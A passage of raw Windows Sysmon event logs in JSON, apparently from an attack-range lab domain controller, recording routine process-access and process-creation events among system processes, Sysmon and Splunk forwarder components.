C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4120,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.617\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.617","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4121,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.617\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02BD-5F25-0000-001004110600}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.617","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02BD-5F25-0000-001004110600}","TargetProcessId":"4676","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4122,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:53.758\r\nSourceProcessGUID: {A837DB8D-02BD-5F25-0000-001004110600}\r\nSourceProcessId: 4676\r\nSourceThreadId: 3488\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:53.758","SourceProcessGUID":"{A837DB8D-02BD-5F25-0000-001004110600}","SourceProcessId":"4676","SourceThreadId":"3488","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4123,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.166\r\nProcessGuid: {A837DB8D-02BE-5F25-0000-0010DB120600}\r\nProcessId: 4908\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.166","ProcessGuid":"{A837DB8D-02BE-5F25-0000-0010DB120600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4124,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.164\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02BE-5F25-0000-0010DB120600}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.164","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02BE-5F25-0000-0010DB120600}","TargetProcessId":"4908","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4125,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.164\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02BE-5F25-0000-0010DB120600}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.164","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02BE-5F25-0000-0010DB120600}","TargetProcessId":"4908","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4126,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.164\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.164","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4127,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.164\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:54.164","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4128,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:54.164\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: 